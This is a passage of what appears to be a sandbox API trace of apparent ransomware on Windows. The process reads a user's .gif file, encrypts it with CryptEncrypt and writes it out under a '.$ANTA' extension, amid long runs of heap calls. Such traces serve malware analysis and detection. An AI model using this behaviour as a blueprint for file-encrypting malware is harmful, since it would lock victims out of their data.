hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0094.776] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0094.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0094.777] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0094.777] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.777] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\W ZDfbD_wanSc.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\w zdfbd_wansc.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0094.777] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.777] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0094.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0094.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0094.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.778] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0094.778] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0094.779] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0094.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0094.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0094.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0094.779] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\W ZDfbD_wanSc.gif.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\w zdfbd_wansc.gif.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0094.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0094.780] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0094.780] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0094.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0e020 [0094.784] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0094.784] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0xf2e9, lpOverlapped=0x0) returned 1 [0094.786] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0094.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf2e9) returned 0x4516010 [0094.790] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0094.790] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0094.790] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0094.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0094.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0094.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0094.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0094.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0094.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0094.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0094.790] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.790] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0094.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0094.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0094.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0094.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796de8 [0094.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0094.791] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e28a0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e28a0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0094.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0094.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0094.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0094.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0094.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0094.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0094.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0094.791] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0094.791] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.851] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0094.851] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.851] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0094.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0094.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0094.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0094.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cabf8 [0094.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cabf8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0094.852] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xf2e9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xf2f0) returned 1 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0094.852] CharLowerBuffW (in: lpsz="byte[62193]", cchLength=0xb | out: lpsz="byte[62193]") returned 0xb [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0094.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0094.852] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.853] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0094.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0094.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0094.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0094.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cafa0 [0094.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cafa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0094.853] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e538*=0xf2e9, dwBufLen=0xf2f0 | out: pbData=0x499a008*, pdwDataLen=0x144e538*=0xf2f0) returned 1 [0094.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0094.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0094.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0094.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0094.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0094.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0094.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0094.854] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.854] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.854] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.854] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xf2f0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0xf2f0, lpOverlapped=0x0) returned 1 [0094.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0094.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0094.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0094.856] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0094.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0094.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0094.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0094.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0094.857] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0094.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0094.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0094.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0094.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0094.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0094.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca958 [0094.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0094.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0094.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0094.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0094.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca790 [0094.857] RtlAllocateHeap 